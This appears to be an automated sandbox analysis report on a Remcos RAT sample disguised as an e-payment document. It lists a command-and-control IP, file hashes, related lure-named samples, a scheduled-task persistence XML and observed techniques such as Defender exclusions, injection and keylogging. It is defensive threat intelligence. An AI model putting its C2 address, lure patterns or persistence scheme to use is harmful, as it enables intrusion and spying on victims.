            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading            		Cached Domain Credentials131
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465312 Sample: e-Payment.NET.CMS4006975815.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 14 other signatures 2->55 7 JXHPwNYzysUjKo.exe 5 2->7         started        11 e-Payment.NET.CMS4006975815.exe 7 2->11         started        process3 file4 37 C:\Users\user\...\JXHPwNYzysUjKo.exe.log, ASCII 7->37 dropped 57 Antivirus detection for dropped file 7->57 59 Multi AV Scanner detection for dropped file 7->59 61 Detected Remcos RAT 7->61 69 7 other signatures 7->69 13 JXHPwNYzysUjKo.exe 7->13         started        16 schtasks.exe 1 7->16         started        39 C:\Users\user\AppData\...\JXHPwNYzysUjKo.exe, PE32 11->39 dropped 41 C:\...\JXHPwNYzysUjKo.exe:Zone.Identifier, ASCII 11->41 dropped 43 C:\Users\user\AppData\Local\...\tmpD623.tmp, XML 11->43 dropped 45 C:\...\e-Payment.NET.CMS4006975815.exe.log, ASCII 11->45 dropped 63 Uses schtasks.exe or at.exe to add and modify task schedules 11->63 65 Adds a directory exclusion to Windows Defender 11->65 67 Injects a PE file into a foreign processes 11->67 18 e-Payment.NET.CMS4006975815.exe 1 2 11->18         started        21 powershell.exe 23 11->21         started        23 powershell.exe 23 11->23         started        25 schtasks.exe 1 11->25         started        signatures5 process6 dnsIp7 71 Detected Remcos RAT 13->71 73 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->73 27 conhost.exe 16->27         started        47 62.102.148.166, 3319, 49707, 49710 TEKNIKBYRANSE Sweden 18->47 75 Installs a global keyboard hook 18->75 77 Loading BitLocker PowerShell Module 21->77 29 WmiPrvSE.exe 21->29         started        31 conhost.exe 21->31         started        33 conhost.exe 23->33         started        35 conhost.exe 25->35         started        signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            e-Payment.NET.CMS4006975815.exe42%ReversingLabsWin32.Backdoor.Remcos
            e-Payment.NET.CMS4006975815.exe100%AviraHEUR/AGEN.1308647
            e-Payment.NET.CMS4006975815.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe100%AviraHEUR/AGEN.1308647
            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe42%ReversingLabsWin32.Backdoor.Remcos

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            62.102.148.1660%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            62.102.148.166true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namee-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            62.102.148.166
            		unknownSweden
            		51815TEKNIKBYRANSEtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1465312
            Start date and time:2024-07-01 15:12:54 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 9m 25s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:19
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:e-Payment.NET.CMS4006975815.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@19/16@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 64
            • Number of non-executed functions: 114
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: e-Payment.NET.CMS4006975815.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            09:13:47API Interceptor11268470x Sleep call for process: e-Payment.NET.CMS4006975815.exe modified
            09:13:49API Interceptor33x Sleep call for process: powershell.exe modified
            09:13:52API Interceptor2x Sleep call for process: JXHPwNYzysUjKo.exe modified
            14:13:50Task SchedulerRun new task: JXHPwNYzysUjKo path: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            62.102.148.166GST Challan.pdf.exeGet hashmaliciousRemcosBrowse
              845c3ba76768948ab3df490599f02d060cd464c6251e16e7847d53707254ee46_dump.exeGet hashmaliciousRemcosBrowse
                Challan copy.pdf.exeGet hashmaliciousRemcosBrowse
                  Property document.pdf.exeGet hashmaliciousRemcosBrowse
                    ICICI Ref No. CMS4213872601.pdf.exeGet hashmaliciousRemcosBrowse
                      GST e-Payment.NET.CMS4006900371.exeGet hashmaliciousRemcosBrowse
                        M3s8X1ORFt.exeGet hashmaliciousUnknownBrowse
                          lib64.exeGet hashmaliciousUnknownBrowse

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            TEKNIKBYRANSEGST Challan.pdf.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.166
                            845c3ba76768948ab3df490599f02d060cd464c6251e16e7847d53707254ee46_dump.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.166
                            Challan copy.pdf.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.166
                            Property document.pdf.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.166
                            ICICI Ref No. CMS4213872601.pdf.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.166
                            GST e-Payment.NET.CMS4006900371.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.166
                            2rMV8dDPMo.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 62.102.148.185
                            HwyuZkjbDs.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.189
                            e-Payment Challan.Net.CMS4006975825.exeGet hashmaliciousRemcosBrowse
                            • 62.102.148.185
                            GST e-Payment Challan.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 62.102.148.185

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JXHPwNYzysUjKo.exe.log

                            Download File
                            Process:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:true
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e-Payment.NET.CMS4006975815.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:true
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2232
                            Entropy (8bit):5.380747059108785
                            Encrypted:false
                            SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyufF:lGLHxvIIwLgZ2KRHWLOugbfF
                            MD5:4A02B86CF7B2EB5514FECA1C0B114C79
                            SHA1:0361A50A97DFE42E7E55A449C79C9B6F27CDA9AC
                            SHA-256:7DE2629DC87244025359CEB352F3DB49E824665DA5A22BD2A808A507D995856D
                            SHA-512:3DE90A07BCCBD60FE1388C7CDBFEEC8BB323B4797D6DE46ACD770809CF0856098057BE16E5CAA3B69CFF25A33AAB696445A223994964B002F8CB6AF9F041FB23
                            Malicious:false
                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1djrpbgi.hmy.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oz2nbvv.jlu.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fwcc2aa.lmy.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvedl5xu.utw.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kpx5lrh0.pqn.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwbfd31x.i1b.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uk5f5a42.s0f.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvrcatpp.g5e.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\tmpD623.tmp

                            Download File
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1573
                            Entropy (8bit):5.108862566319255
                            Encrypted:false
                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewWv:HeLwYrFdOFzOz6dKrsuqX
                            MD5:FB065A253D6FF24763C889638A255D60
                            SHA1:D23343AA772A4615A592715F14D938BDC81D32EA
                            SHA-256:D2609CEFD53BB9542DD4F58FDA0A9FF374D1DCFF2CCF6C2F2CF0E0918B17FDE8
                            SHA-512:EF1F6C5F524E8E2FBC5E9FBEDE504D37B0835BB3F1CF5DF482638186098CA359269F208B79BD1256EDB9ECD2F44D99615EE3901899EBB666AAED4501E0ED751C
                            Malicious:true
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                            C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp

                            Download File
                            Process:C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1573
                            Entropy (8bit):5.108862566319255
                            Encrypted:false
                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewWv:HeLwYrFdOFzOz6dKrsuqX
                            MD5:FB065A253D6FF24763C889638A255D60
                            SHA1:D23343AA772A4615A592715F14D938BDC81D32EA
                            SHA-256:D2609CEFD53BB9542DD4F58FDA0A9FF374D1DCFF2CCF6C2F2CF0E0918B17FDE8
                            SHA-512:EF1F6C5F524E8E2FBC5E9FBEDE504D37B0835BB3F1CF5DF482638186098CA359269F208B79BD1256EDB9ECD2F44D99615EE3901899EBB666AAED4501E0ED751C
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe

                            Download File
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):771584
                            Entropy (8bit):7.734947931218711
                            Encrypted:false
                            SSDEEP:12288:ArwE8GILjWLWg7DTBCZrWvGYjS/9ofzvOW4J9gAlMTAq9Ys2D485eP4sSEAmD:tc7vB2AS/9c2WkgAwAq2s0N5e6
                            MD5:B16699F8FD5E68DE16D8904EC7CD3ED2
                            SHA1:45FAC6B1832FAD2FEF90E1064AB4E78E0B164737
                            SHA-256:D21D0451A7A8B112776118D88154BF7EAB2703B13BF6AE1DCAEC2F959BF42305
                            SHA-512:65F6A8A1899CAAB9AA2F120F880736B92617E9AD0F8C033C0F7C194D3E0A51CD90EA98F5C63BEB6BE213689CAD74AF7630360E0C882B8A0BFC2D7040943B5297
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 42%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f..............0.................. ........@.. ....................... ............@.................................P...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........... \......2.......P...........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....

                            C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe:Zone.Identifier

                            Download File
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0

                            C:\Users\user\AppData\Roaming\egsy\logs.dat

                            Download File
                            Process:C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):159
                            Entropy (8bit):4.421936275604687
                            Encrypted:false
                            SSDEEP:3:M1XKe3ooDHn/iuFMIFDKXFZZ1vl7Hn/iuFMIFDKXFj0R21vl7Hn/iuFMIFDKXFEA:0au1TDMFv1vx1TDMFIU1vx1TDMFEHU1v
                            MD5:121AD0A65493936BC04F8469291ED3C4
                            SHA1:56CA2033FA0B7703F1A383EEB06022A3D44DB027
                            SHA-256:8905303413FCCD22F60E8C149970BFB5ADA50FC17EC26C71CE6949AD78703C2C
